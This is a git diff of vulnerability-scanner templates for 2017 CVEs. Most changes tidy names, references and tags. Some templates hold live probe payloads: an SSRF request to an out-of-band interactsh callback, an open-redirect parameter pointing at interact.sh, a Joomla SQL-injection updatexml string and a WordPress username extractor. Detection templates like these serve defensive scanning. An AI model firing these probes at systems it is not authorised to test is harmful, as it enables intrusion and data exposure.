+    - https://nvd.nist.gov/vuln/detail/CVE-2017-18598
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
-    cvss-score: 6.10
+    cvss-score: 6.1
     cve-id: CVE-2017-18598
     cwe-id: CWE-79
+  tags: wp-plugin,oast,wpscan,cve,cve2017,wordpress,ssrf,xss
 
-requests:
-  - method: GET
-    path:
-      - '{{BaseURL}}/wp-content/plugins/qards/html2canvasproxy.php?url=https://{{interactsh-url}}'
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: interactsh_protocol
-        words:
-          - "http"
-
-      - type: word
-        part: body
-        words:
-          - "console.log"
\ No newline at end of file
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/qards/html2canvasproxy.php?url=https://{{interactsh-url}}'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "http"
+
+      - type: word
+        part: body
+        words:
+          - "console.log"
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2017/CVE-2017-18638.yaml b/cves/2017/CVE-2017-18638.yaml
index 4e1ca013f5..19af342c52 100644
--- a/cves/2017/CVE-2017-18638.yaml
+++ b/cves/2017/CVE-2017-18638.yaml
@@ -1,11 +1,11 @@
 id: CVE-2017-18638
 
 info:
-  name: Graphite 'graphite.composer.views.send_email' SSRF
+  name: Graphite <=1.1.5 - Server-Side Request Forgery
   author: huowuzhao
   severity: high
-  description: Graphite's send_email in graphite-web/webapp/graphite/composer/views.py in versions up to 1.1.5 is vulnerable to SSRF. The vulnerable SSRF endpoint can be used by an attacker to have the Graphite web
-    server request any resource. The response to this SSRF request is encoded into an image file and then sent to an email address that can be supplied by the attacker. Thus, an attacker can exfiltrate any information.
+  description: |
+    Graphite's send_email in graphite-web/webapp/graphite/composer/views.py in versions up to 1.1.5 is vulnerable to server-side request forgery (SSR)F. The vulnerable SSRF endpoint can be used by an attacker to have the Graphite web server request any resource. The response to this SSRF request is encoded into an image file and then sent to an email address that can be supplied by the attacker. Thus, an attacker can exfiltrate any information.
   reference:
     - http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html
     - https://github.com/graphite-project/graphite-web/issues/2008
@@ -28,3 +28,5 @@ requests:
         part: interactsh_protocol
         words:
           - "http"
+
+# Enhanced by mp on 2022/06/19
diff --git a/cves/2017/CVE-2017-3506.yaml b/cves/2017/CVE-2017-3506.yaml
index d8e4d2cd0f..aeb8965d52 100644
--- a/cves/2017/CVE-2017-3506.yaml
+++ b/cves/2017/CVE-2017-3506.yaml
@@ -8,11 +8,13 @@ info:
   reference:
     - https://hackerone.com/reports/810778
     - https://nvd.nist.gov/vuln/detail/CVE-2017-3506
+    - http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html
+    - http://web.archive.org/web/20210124033731/https://www.securityfocus.com/bid/97884/
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
     cvss-score: 7.4
     cve-id: CVE-2017-3506
-  tags: cve,cve2017,weblogic,oracle,rce,oast
+  tags: rce,oast,hackerone,cve,cve2017,weblogic,oracle
 
 requests:
   - raw:
diff --git a/cves/2017/CVE-2017-3528.yaml b/cves/2017/CVE-2017-3528.yaml
index 21895648c3..f4756f09b9 100644
--- a/cves/2017/CVE-2017-3528.yaml
+++ b/cves/2017/CVE-2017-3528.yaml
@@ -4,30 +4,28 @@ info:
   name: Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect
   author: 0x_Akoko
   severity: medium
-  description: 'The Oracle Applications Framework component of Oracle E-Business Suite (subcomponent: Popup windows (lists of values, datepicker, etc.)) is impacted by open redirect issues in versions 12.1.3, 12.2.3,
-    12.2.4, 12.2.5 and 12.2.6. These easily exploitable vulnerabilities allow unauthenticated attackers with network access via HTTP to compromise Oracle Applications Framework. Successful attacks require human interaction
-    from a person other than the attacker and while the vulnerability is in Oracle Applications Framework, attacks may significantly impact additional products. Successful attacks of this vulnerability can result
-    in unauthorized update, insert or delete access to some of Oracle Applications Framework accessible data.'
+  description: 'The Oracle Applications Framework component of Oracle E-Business Suite (subcomponent: Popup windows (lists of values, datepicker, etc.)) is impacted by open redirect issues in versions 12.1.3, 12.2.3, 12.2.4, 12.2.5 and 12.2.6. These easily exploitable vulnerabilities allow unauthenticated attackers with network access via HTTP to compromise Oracle Applications Framework. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Applications Framework, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Applications Framework accessible data.'
   reference:
     - https://blog.zsec.uk/cve-2017-3528/
     - https://www.exploit-db.com/exploits/43592
     - https://nvd.nist.gov/vuln/detail/CVE-2017-3528
+    - http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
     cvss-score: 5.4
     cve-id: CVE-2017-3528
     cwe-id: CWE-601
-  tags: cve,cve2017,oracle,redirect
+  tags: oracle,redirect,edb,cve,cve2017
 
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=%2f%5cexample.com"
+      - "{{BaseURL}}/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=%2f%5cinteract.sh"
 
     matchers:
       - type: word
         words:
-          - 'noresize src="/\example.com?configName='
+          - 'noresize src="/\interact.sh?configName='
         part: body
 
 # Enhanced by mp on 2022/04/14
diff --git a/cves/2017/CVE-2017-3881.yaml b/cves/2017/CVE-2017-3881.yaml
index ab883c8f87..12e351f92f 100644
--- a/cves/2017/CVE-2017-3881.yaml
+++ b/cves/2017/CVE-2017-3881.yaml
@@ -16,7 +16,7 @@ info:
     cvss-score: 9.8
     cve-id: CVE-2017-3881
     cwe-id: CWE-20
-  tags: cve,cve2017,cisco,rce,network
+  tags: cve2017,cisco,rce,network,kev,msf,cve
 
 network:
   - inputs:
diff --git a/cves/2017/CVE-2017-4011.yaml b/cves/2017/CVE-2017-4011.yaml
index 77cda0cb40..2d27151229 100644
--- a/cves/2017/CVE-2017-4011.yaml
+++ b/cves/2017/CVE-2017-4011.yaml
@@ -1,14 +1,14 @@
 id: CVE-2017-4011
 
 info:
-  name: McAfee NDLP User-Agent XSS
+  name: McAfee Network Data Loss Prevention 9.3.x - Cross-Site Scripting
   author: geeknik
   severity: medium
-  description: McAfee Network Data Loss Prevention (NDLP) 9.3.x allows remote attackers to get session/cookie information via modification of the HTTP request.
+  description: McAfee Network Data Loss Prevention User-Agent 9.3.x contains a cross-site scripting vulnerability which allows remote attackers to get session/cookie information via modification of the HTTP request.
   reference:
     - https://medium.com/@david.valles/cve-2017-4011-reflected-xss-found-in-mcafee-network-data-loss-prevention-ndlp-9-3-x-cf20451870ab
     - https://kc.mcafee.com/corporate/index?page=content&id=SB10198
-    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-4011
+    - https://nvd.nist.gov/vuln/detail/CVE-2017-4011
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -34,3 +34,5 @@ requests:
         part: header
         words:
           - "text/html"
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2017/CVE-2017-5487.yaml b/cves/2017/CVE-2017-5487.yaml
index bb3c5441ce..d33e90763b 100644
--- a/cves/2017/CVE-2017-5487.yaml
+++ b/cves/2017/CVE-2017-5487.yaml
@@ -2,43 +2,55 @@ id: CVE-2017-5487
 
 info:
   name: WordPress Core < 4.7.1 - Username Enumeration
-  author: Manas_Harsh,daffainfo,geeknik
+  author: Manas_Harsh,daffainfo,geeknik,dr0pd34d
   severity: medium
   description: WordPress Core < 4.7.1 is susceptible to user enumeration because it does not properly restrict listings of post authors via wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API, which allows remote attackers to obtain sensitive information via a wp-json/wp/v2/users request.
   reference:
     - https://www.exploit-db.com/exploits/41497
     - https://nvd.nist.gov/vuln/detail/CVE-2017-5487
+    - https://www.wordfence.com/blog/2016/12/wordfence-blocks-username-harvesting-via-new-rest-api-wp-4-7/
+    - https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
     cvss-score: 5.3
     cve-id: CVE-2017-5487
     cwe-id: CWE-200
-  tags: cve,cve2017,wordpress
+  metadata:
+    shodan-query: http.component:"WordPress"
+    verified: "true"
+  tags: cve,cve2017,wordpress,wp,edb
 
 requests:
   - method: GET
     path:
       - "{{BaseURL}}/wp-json/wp/v2/users/"
       - "{{BaseURL}}/?rest_route=/wp/v2/users/"
+
     stop-at-first-match: true
     matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 200
-      - type: word
-        part: header
-        words:
-          - "application/json"
+
       - type: word
+        part: body
         words:
           - '"id":'
           - '"name":'
           - '"avatar_urls":'
         condition: and
+
+      - type: word
+        part: header
+        words:
+          - "application/json"
+
+      - type: status
+        status:
+          - 200
+
     extractors:
       - type: json
+        part: body
+        name: "usernames"
         json:
+          - '.[] | .slug'
           - '.[].name'
-
-# Enahnced by mp 03/31/2022
diff --git a/cves/2017/CVE-2017-5521.yaml b/cves/2017/CVE-2017-5521.yaml
index 08c8a6aa55..f14e526070 100644
--- a/cves/2017/CVE-2017-5521.yaml
+++ b/cves/2017/CVE-2017-5521.yaml
@@ -1,19 +1,23 @@
 id: CVE-2017-5521
 
 info:
-  name: Bypassing Authentication on NETGEAR Routers
+  name: NETGEAR Routers - Authentication Bypass
   author: princechaddha
   severity: high
-  description: An issue was discovered on NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900, and R8000 devices.They are prone to password disclosure via simple crafted requests to the web management server.
+  description: |
+    NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900, and R8000 devices are susceptible to authentication bypass via simple crafted requests to the web management server.
   reference:
-    - https://www.cvedetails.com/cve/CVE-2017-5521/
     - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2017-5521-bypassing-authentication-on-netgear-routers/
+    - http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability
+    - http://web.archive.org/web/20210123212905/https://www.securityfocus.com/bid/95457/
+    - https://nvd.nist.gov/vuln/detail/CVE-2017-5521
+    - https://www.cvedetails.com/cve/CVE-2017-5521/
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 8.1
     cve-id: CVE-2017-5521
     cwe-id: CWE-200
-  tags: cve,cve2017,auth-bypass,netgear
+  tags: cve,cve2017,auth-bypass,netgear,router,kev
 
 requests:
   - method: GET
@@ -23,11 +27,14 @@ requests:
     matchers-condition: and
     matchers:
       - type: word
+        part: body
         words:
           - "right\">Router\\s*Admin\\s*Username<"
           - "right\">Router\\s*Admin\\s*Password<"
         condition: and
-        part: body
+
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/06/19
diff --git a/cves/2017/CVE-2017-5631.yaml b/cves/2017/CVE-2017-5631.yaml
index 6dcc26746a..d8e29efb22 100644
--- a/cves/2017/CVE-2017-5631.yaml
+++ b/cves/2017/CVE-2017-5631.yaml
@@ -1,19 +1,20 @@
 id: CVE-2017-5631
 
 info:
-  name: CaseAware - Cross Site Scripting
+  name: KMCIS CaseAware - Cross-Site Scripting
   author: edoardottt
   severity: medium
-  description: An issue was discovered in KMCIS CaseAware. Reflected cross site scripting is present in the user parameter (i.e., "usr") that is transmitted in the login.php query string.
+  description: KMCIS CaseAware contains a reflected cross-site scripting vulnerability via the user parameter transmitted in the login.php query string.
   reference:
+    - https://www.openbugbounty.org/incidents/228262/
+    - https://www.exploit-db.com/exploits/42042/
     - https://nvd.nist.gov/vuln/detail/CVE-2017-5631
-    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5631
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2017-5631
     cwe-id: CWE-79
-  tags: cve,cve2017,xss,caseaware
+  tags: edb,cve,cve2017,xss,caseaware
 
 requests:
   - method: GET
@@ -35,3 +36,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2017/CVE-2017-5638.yaml b/cves/2017/CVE-2017-5638.yaml
index 23bcd8bc85..5da6dbb20d 100644
--- a/cves/2017/CVE-2017-5638.yaml
+++ b/cves/2017/CVE-2017-5638.yaml
@@ -8,12 +8,14 @@ info:
   reference:
     - https://github.com/mazen160/struts-pwn
     - https://nvd.nist.gov/vuln/detail/CVE-2017-5638
+    - https://isc.sans.edu/diary/22169
+    - https://github.com/rapid7/metasploit-framework/issues/8064
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
-    cvss-score: 10.0
+    cvss-score: 10
     cve-id: CVE-2017-5638
     cwe-id: CWE-20
-  tags: cve,cve2017,struts,rce,apache
+  tags: apache,kev,msf,cve,cve2017,struts,rce
 
 requests:
   - raw:
diff --git a/cves/2017/CVE-2017-5982.yaml b/cves/2017/CVE-2017-5982.yaml
index 8896ef3a05..0332b376c6 100644
--- a/cves/2017/CVE-2017-5982.yaml
+++ b/cves/2017/CVE-2017-5982.yaml
@@ -1,19 +1,21 @@
 id: CVE-2017-5982
 
 info:
-  name: Kodi 17.1 Local File Inclusion
+  name: Kodi 17.1 - Local File Inclusion
   author: 0x_Akoko
   severity: high
-  description: Insufficient validation of user input is performed on this URL resulting in a local file inclusion vulnerability.
+  description: |
+    Kodi 17.1 is vulnerable to local file inclusion vulnerabilities because of insufficient validation of user input.
   reference:
     - https://cxsecurity.com/issue/WLB-2017020164
-    - https://www.cvedetails.com/cve/CVE-2017-5982
+    - https://www.exploit-db.com/exploits/41312/
+    - https://nvd.nist.gov/vuln/detail/CVE-2017-5982
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2017-5982
     cwe-id: CWE-98
-  tags: cve,cve2017,kodi,lfi
+  tags: cve2017,kodi,lfi,edb,cve
 
 requests:
   - method: GET
@@ -30,3 +32,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/06/19
diff --git a/cves/2017/CVE-2017-6090.yaml b/cves/2017/CVE-2017-6090.yaml
index 0e8728cf90..2dc16ebb62 100644
--- a/cves/2017/CVE-2017-6090.yaml
+++ b/cves/2017/CVE-2017-6090.yaml
@@ -8,12 +8,15 @@ info:
   reference:
     - https://sysdream.com/news/lab/2017-09-29-cve-2017-6090-phpcollab-2-5-1-arbitrary-file-upload-unauthenticated/
     - https://nvd.nist.gov/vuln/detail/CVE-2017-6090
+    - https://www.exploit-db.com/exploits/42934/
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 8.8
     cve-id: CVE-2017-6090
     cwe-id: CWE-434
-  tags: cve,cve2017,phpcollab,rce,fileupload
+  metadata:
+    shodan-query: http.title:"PhpCollab"
+  tags: cve2017,phpcollab,rce,fileupload,edb,cve,intrusive
 
 requests:
   - raw:
diff --git a/cves/2017/CVE-2017-7269.yaml b/cves/2017/CVE-2017-7269.yaml
index c3897f688a..07f7419224 100644
--- a/cves/2017/CVE-2017-7269.yaml
+++ b/cves/2017/CVE-2017-7269.yaml
@@ -10,12 +10,13 @@ info:
     - https://blog.0patch.com/2017/03/0patching-immortal-cve-2017-7269.html
     - https://github.com/danigargu/explodingcan/blob/master/explodingcan.py
     - https://nvd.nist.gov/vuln/detail/CVE-2017-7269
+    - https://github.com/edwardz246003/IIS_exploit
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2017-7269
     cwe-id: CWE-119
-  tags: cve,cve2017,rce,windows,iis
+  tags: cve,cve2017,rce,windows,iis,kev
 
 requests:
   - method: OPTIONS
@@ -30,7 +31,6 @@ requests:
           - "IIS/6.0"
 
       - type: dsl
-        part: header
         dsl:
           - regex("<DAV:sql>", dasl)    # lowercase header name: DASL
           - regex("[\d]+(,\s+[\d]+)?", dav)    # lowercase header name: DAV
@@ -41,4 +41,5 @@ requests:
       - type: status
         status:
           - 200
+
 # Enhanced by mp on 2022/05/11
diff --git a/cves/2017/CVE-2017-7391.yaml b/cves/2017/CVE-2017-7391.yaml
index 9113c6f453..0d5e78e67b 100644
--- a/cves/2017/CVE-2017-7391.yaml
+++ b/cves/2017/CVE-2017-7391.yaml
@@ -1,13 +1,15 @@
 id: CVE-2017-7391
 
 info:
-  name: Magmi Cross-Site Scripting v.0.7.22
+  name: Magmi 0.7.22 - Cross-Site Scripting
   author: pikpikcu
   severity: medium
-  description: A Cross-Site Scripting (XSS) was discovered in 'Magmi 0.7.22'. The vulnerability exists due to insufficient filtration of user-supplied data (prefix) passed to the 'magmi-git-master/magmi/web/ajax_gettime.php' URL.
+  description: Magmi 0.7.22 contains a cross-site scripting vulnerability due to insufficient filtration of user-supplied data (prefix) passed to the magmi-git-master/magmi/web/ajax_gettime.php URL.
   reference:
     - https://github.com/dweeves/magmi-git/issues/522
     - https://github.com/dweeves/magmi-git/releases/download/0.7.22/magmi_full_0.7.22.zip
+    - https://github.com/dweeves/magmi-git/pull/525
+    - https://nvd.nist.gov/vuln/detail/CVE-2017-7391
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -35,3 +37,5 @@ requests:
         part: header
         words:
           - "text/html"
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2017/CVE-2017-7615.yaml b/cves/2017/CVE-2017-7615.yaml
index 304919ddbc..4181cd4b74 100644
--- a/cves/2017/CVE-2017-7615.yaml
+++ b/cves/2017/CVE-2017-7615.yaml
@@ -6,20 +6,23 @@ id: CVE-2017-7615
 # MantisBT before 1.3.10, 2.2.4, and 2.3.1, that can be downloaded on reference[1].
 
 info:
-  name: MantisBT <=2.30 - Arbitrary Password Reset and Unauthenticated Admin Access
+  name: MantisBT <=2.30 - Arbitrary Password Reset/Admin Access
   author: bp0lr,dwisiswant0
   severity: high
-  description: MantisBT through 2.3.0 allows arbitrary password reset and unauthenticated admin access via an empty confirm_hash value to verify.php.
+  description: |
+    MantisBT through 2.3.0 allows arbitrary password reset and unauthenticated admin access via an empty confirm_hash value to verify.php.
   reference:
     - https://sourceforge.net/projects/mantisbt/files/mantis-stable/
     - http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-PRE-AUTH-REMOTE-PASSWORD-RESET.txt
     - https://www.exploit-db.com/exploits/41890
+    - http://www.openwall.com/lists/oss-security/2017/04/16/2
+    - https://nvd.nist.gov/vuln/detail/CVE-2017-7615
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 8.8
     cve-id: CVE-2017-7615
     cwe-id: CWE-640
-  tags: cve,cve2017,mantisbt
+  tags: cve,cve2017,mantisbt,unauth,edb
 
 requests:
   - method: GET
@@ -34,10 +37,12 @@ requests:
     matchers-condition: and
     matchers:
       - type: word
+        part: body
         words:
           - "<input type=\"hidden\" name=\"account_update_token\" value=\"([a-zA-Z0-9_-]+)\""
-        part: body
 
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/06/19
diff --git a/cves/2017/CVE-2017-7921.yaml b/cves/2017/CVE-2017-7921.yaml
index d71e6d12ab..cd9e3b9bde 100644
--- a/cves/2017/CVE-2017-7921.yaml
+++ b/cves/2017/CVE-2017-7921.yaml
@@ -11,7 +11,7 @@ info:
     - https://nvd.nist.gov/vuln/detail/CVE-2017-7921
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
-    cvss-score: 10.0
+    cvss-score: 10
     cve-id: CVE-2017-7921
     cwe-id: CWE-287
   tags: cve,cve2017,auth-bypass,hikvision
diff --git a/cves/2017/CVE-2017-8917.yaml b/cves/2017/CVE-2017-8917.yaml
index 0806eaa1f0..6569d699db 100644
--- a/cves/2017/CVE-2017-8917.yaml
+++ b/cves/2017/CVE-2017-8917.yaml
@@ -8,6 +8,9 @@ info:
     Joomla! 3.7.x before 3.7.1 contains a SQL injection vulnerability that could allow attackers to execute arbitrary SQL commands via unspecified vectors.
   reference:
     - https://www.cvedetails.com/cve/CVE-2017-8917/
+    - https://developer.joomla.org/security-centre/692-20170501-core-sql-injection.html
+    - http://web.archive.org/web/20210421142819/https://www.securityfocus.com/bid/98515
+    - http://web.archive.org/web/20211207050608/https://securitytracker.com/id/1038522
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
@@ -15,15 +18,18 @@ info:
     cwe-id: CWE-89
   tags: cve,cve2017,joomla,sqli
 
+variables:
+  num: "999999999"
+
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5(8888)),1)"
+      - "{{BaseURL}}/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5({{num}})),1)"
 
     matchers:
       - type: word
         part: body
         words:
-          - "cf79ae6addba60ad018347359bd144d2"
+          - '{{md5({{num}})}}'
 
 # Enhanced by mp on 2022/05/11
diff --git a/cves/2017/CVE-2017-9140.yaml b/cves/2017/CVE-2017-9140.yaml
index d73d4cc6df..df598c2967 100644
--- a/cves/2017/CVE-2017-9140.yaml
+++ b/cves/2017/CVE-2017-9140.yaml
@@ -8,12 +8,14 @@ info:
   reference:
     - https://www.veracode.com/blog/secure-development/anatomy-cross-site-scripting-flaw-telerik-reporting-module
     - https://nvd.nist.gov/vuln/detail/CVE-2017-9140
+    - https://www.veracode.com/blog/research/anatomy-cross-site-scripting-flaw-telerik-reporting-module
+    - http://www.telerik.com/support/whats-new/reporting/release-history/telerik-reporting-r1-2017-sp2-(version-11-0-17-406)
+  remediation: Upgrade to application version 11.0.17.406 (2017 SP2) or later.
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2017-9140
     cwe-id: CWE-79
-  remediation: Upgrade to application version 11.0.17.406 (2017 SP2) or later.
   tags: cve,cve2017,xss,telerik
 
 requests:
diff --git a/cves/2017/CVE-2017-9288.yaml b/cves/2017/CVE-2017-9288.yaml
index 9068b19ff1..ae0e3856b1 100644
--- a/cves/2017/CVE-2017-9288.yaml
+++ b/cves/2017/CVE-2017-9288.yaml
@@ -1,11 +1,14 @@
 id: CVE-2017-9288
 
 info:
-  name: Raygun4WP <= 1.8.0 - Reflected Cross-Site Scripting (XSS)
+  name: WordPress Raygun4WP <=1.8.0 - Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: The Raygun4WP plugin 1.8.0 for WordPress is vulnerable to a reflected XSS in sendtesterror.php (backurl parameter).
+  description: WordPress Raygun4WP 1.8.0 contains a reflected cross-site scripting vulnerability via sendtesterror.php.
   reference:
+    - https://github.com/MindscapeHQ/raygun4wordpress/pull/17
+    - https://github.com/MindscapeHQ/raygun4wordpress/issues/16
+    - http://jgj212.blogspot.kr/2017/05/a-reflected-xss-vulnerability-in.html
     - https://nvd.nist.gov/vuln/detail/CVE-2017-9288
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
@@ -34,3 +37,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2017/CVE-2017-9506.yaml b/cves/2017/CVE-2017-9506.yaml
index caed5d1c70..0af56e3758 100644
--- a/cves/2017/CVE-2017-9506.yaml
+++ b/cves/2017/CVE-2017-9506.yaml
@@ -1,20 +1,22 @@
 id: CVE-2017-9506
 
 info:
-  name: Jira IconURIServlet SSRF
+  name: Atlassian Jira IconURIServlet - Cross-Site Scripting/Server-Side Request Forgery
   author: pdteam
   severity: medium
-  description: The IconUriServlet of the Atlassian OAuth Plugin from version 1.3.0 before version 1.9.12 and from version 2.0.0 before version 2.0.4 allows remote attackers to access the content of internal network
-    resources and/or perform an XSS attack via Server Side Request Forgery (SSRF).
+  description: The Atlassian Jira IconUriServlet of the OAuth Plugin from version 1.3.0 before version 1.9.12 and from version 2.0.0 before version 2.0.4 contains a cross-site scripting vulnerability which allows remote attackers to access the content of internal network resources and/or perform an attack via Server Side Request Forgery.
   reference:
     - http://dontpanic.42.nl/2017/12/there-is-proxy-in-your-atlassian.html
     - https://ecosystem.atlassian.net/browse/OAUTH-344
     - https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-171018bca2c3
+    - https://nvd.nist.gov/vuln/detail/CVE-2017-9506
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2017-9506
     cwe-id: CWE-918
+  metadata:
+    shodan-query: http.component:"Atlassian Jira"
   tags: cve,cve2017,atlassian,jira,ssrf,oast
 
 requests:
@@ -29,3 +31,5 @@ requests:
         part: interactsh_protocol  # Confirms the HTTP Interaction
         words:
           - "http"
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2017/CVE-2017-9791.yaml b/cves/2017/CVE-2017-9791.yaml
index fbae6cba48..3bda9b4197 100644
--- a/cves/2017/CVE-2017-9791.yaml
+++ b/cves/2017/CVE-2017-9791.yaml
@@ -8,12 +8,13 @@ info:
   reference:
     - http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-9805-3889403.html
     - http://struts.apache.org/docs/s2-048.html
+    - http://web.archive.org/web/20211207175819/https://securitytracker.com/id/1038838
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2017-9791
     cwe-id: CWE-20
-  tags: cve,cve2017,apache,rce,struts
+  tags: cve,cve2017,apache,rce,struts,kev
 
 requests:
   - method: POST
diff --git a/cves/2017/CVE-2017-9805.yaml b/cves/2017/CVE-2017-9805.yaml
index fafd5baa0e..21382df6e0 100644
--- a/cves/2017/CVE-2017-9805.yaml
+++ b/cves/2017/CVE-2017-9805.yaml
@@ -14,7 +14,7 @@ info:
     cvss-score: 8.1
     cve-id: CVE-2017-9805
     cwe-id: CWE-502
-  tags: cve,cve2017,apache,rce,struts
+  tags: cve,cve2017,apache,rce,struts,kev
 
 requests:
   - method: POST
diff --git a/cves/2017/CVE-2017-9822.yaml b/cves/2017/CVE-2017-9822.yaml
index 7c057c9ade..40cd8e773a 100644
--- a/cves/2017/CVE-2017-9822.yaml
+++ b/cves/2017/CVE-2017-9822.yaml
@@ -8,12 +8,14 @@ info:
   reference:
     - https://github.com/murataydemir/CVE-2017-9822
     - https://nvd.nist.gov/vuln/detail/CVE-2017-9822
+    - http://www.dnnsoftware.com/community/security/security-center
+    - http://web.archive.org/web/20210124123810/https://www.securityfocus.com/bid/102213/
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 8.8
     cve-id: CVE-2017-9822
     cwe-id: CWE-20
-  tags: cve,cve2017,dotnetnuke,bypass,rce,deserialization
+  tags: cve,cve2017,dotnetnuke,bypass,rce,deserialization,kev
 
 requests:
   - raw:
diff --git a/cves/2017/CVE-2017-9833.yaml b/cves/2017/CVE-2017-9833.yaml
index be1212b8f9..e1896d0663 100644
--- a/cves/2017/CVE-2017-9833.yaml
+++ b/cves/2017/CVE-2017-9833.yaml
@@ -8,12 +8,14 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/42290
     - https://www.cvedetails.com/cve/CVE-2017-9833
+    - https://pastebin.com/raw/rt7LJvyF
+    - https://www.exploit-db.com/exploits/42290/
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2017-9833
     cwe-id: CWE-22
-  tags: boa,lfr,lfi,cve,cve2017
+  tags: boa,lfr,lfi,cve,cve2017,edb
 
 requests:
   - method: GET
diff --git a/cves/2017/CVE-2017-9841.yaml b/cves/2017/CVE-2017-9841.yaml
index 7dfe3202f6..f4fd0a1d69 100644
--- a/cves/2017/CVE-2017-9841.yaml
+++ b/cves/2017/CVE-2017-9841.yaml
@@ -16,7 +16,7 @@ info:
     cvss-score: 9.8
     cve-id: CVE-2017-9841
     cwe-id: CWE-94
-  tags: cve,cve2017,php,phpunit,rce
+  tags: cve,cve2017,php,phpunit,rce,kev
 
 requests:
 
diff --git a/cves/2018/CVE-2018-0127.yaml b/cves/2018/CVE-2018-0127.yaml
index 3ad69c3b88..5fbeda3b8e 100644
--- a/cves/2018/CVE-2018-0127.yaml
+++ b/cves/2018/CVE-2018-0127.yaml
@@ -7,8 +7,8 @@ info:
